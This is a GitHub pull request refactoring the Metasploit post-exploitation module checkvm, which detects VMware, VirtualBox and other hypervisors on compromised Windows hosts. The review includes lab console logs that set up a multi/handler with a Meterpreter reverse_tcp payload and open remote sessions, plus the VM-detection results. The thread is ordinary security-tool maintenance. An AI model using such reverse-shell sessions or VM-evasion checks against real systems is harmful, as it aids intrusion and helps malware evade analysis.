### PR TITLE
post/windows/gather/checkvm: cleanup, increase efficiency, fix style

### LINKED ISSUE #13624: Architectural issues on scripts.
For example, get this script: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb

Why we  use session.sys.process.get_processes four times?
Why we can't wrote it in variable and use once?
It is very heavily loads the network.

### PR DESCRIPTION
**Pull request by bcoles**
Fixes #13624

* Increase execution speed by ensuring `registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services')` and `session.sys.process.get_processes` are called only once.
* Decrease code duplication. Decrease lines of code by ~33%.
* Update style in line with Rubocop rules.

The module logic should remain the same (unless I've made a mistake). That is, if one hypervisor is identified, all other checks are skipped.

```
msf5 exploit(multi/handler) > [*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.130:50336) at 2020-06-13 18:12:36 -0400

msf5 exploit(multi/handler) > use post/windows/gather/checkvm 
msf5 post(windows/gather/checkvm) > set session 1
session => 1
msf5 post(windows/gather/checkvm) > run

[*] Checking if TEST is a Virtual Machine ...
[+] This is a VMware Virtual Machine
[*] Post module execution completed
msf5 post(windows/gather/checkvm) > notes

Notes
=====

 Time                     Host            Service  Port  Protocol  Type             Data
 ----                     ----            -------  ----  --------  ----             ----
 2020-06-13 22:23:46 UTC  172.16.191.130                           host.hypervisor  {:hypervisor=>"VMware"}
```

Commented out the `vmware?` checks to ensure the module still works, and correctly reports that the system is not a virtual machine:

```
msf5 post(windows/gather/checkvm) > rexploit 
[*] Reloading module...

[*] Checking if TEST is a Virtual Machine ...
[*] TEST appears to be a Physical Machine
[*] Post module execution completed
msf5 post(windows/gather/checkvm) > 

```

### CODE REVIEW

**Comment by harmjay** [comment]
@smcintyre-r7, check this, please.

**Review by egypt — COMMENTED** [review]
Overall, a good change.

File: modules/post/windows/gather/checkvm.rb [hunk 1]
```diff
@@ -9,349 +9,215 @@ class MetasploitModule < Msf::Post
...
-    found ||= vmwarechk(session)
-    found ||= checkvrtlpc(session)
-    found ||= vboxchk(session)
-    found ||= xenchk(session)
-    found ||= qemuchk(session)
-    if found
-      report_virtualization(found)
+    print_status("Checking if #{sysinfo['Computer']} is a Virtual Machine ...")
+
+    @services = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services')
```
[the remark this answers is not in the document]
Comment (bcoles) [reply modules/post/windows/gather/checkvm.rb]: done

File: modules/post/windows/gather/checkvm.rb [hunk 2]
```diff
@@ -9,349 +9,215 @@ class MetasploitModule < Msf::Post
...
+    @processes = session.sys.process.get_processes
```
[the remark this answers is not in the document]
Comment (bcoles) [reply modules/post/windows/gather/checkvm.rb]: done

**Comment by bcoles** [comment]
> 
> 
> Overall, a good change.

yes

File: modules/post/windows/gather/checkvm.rb [hunk 3]
```diff
@@ -9,349 +9,222 @@ class MetasploitModule < Msf::Post
...
-      key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0'
-      if registry_getvaldata(key_path,'Identifier') =~ /vmware/i
-        vm = true
-      end
+  def vmware?
+    if get_services
+      return true if get_services.include?('vmdebug')
+      return true if get_services.include?('vmmouse')
+      return true if get_services.include?('VMTools')
+      return true if get_services.include?('VMMEMCTL')
```
Comment (space-r7) [inline modules/post/windows/gather/checkvm.rb:88]: This isn't super important, but I noticed that this pattern appears a few times in the module. Perhaps this could be replaced with something like `valid_service?`:

```ruby
def valid_service?(services)
  services.each { |service| return true if get_services.include?(service) }

  false
end
```

Comment (bcoles) [reply modules/post/windows/gather/checkvm.rb]: done. i haven't tested the changes.

Comment (space-r7) [reply modules/post/windows/gather/checkvm.rb]: Thanks! LGTM. I'll go ahead and test it out.

**Comment by space-r7** [comment]
Tested with latest changes:

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:49926) at 2020-07-10 13:20:47 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/windows/gather/checkvm
msf5 post(windows/gather/checkvm) > options

Module options (post/windows/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(windows/gather/checkvm) > set session 1
session => 1
msf5 post(windows/gather/checkvm) > run

[*] Checking if DESKTOP-AQT4EG1 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
[*] Post module execution completed
```

**Comment by space-r7** [comment]
## Release Notes

This improves the code and execution time of the `post/windows/gather/checkvm` module.
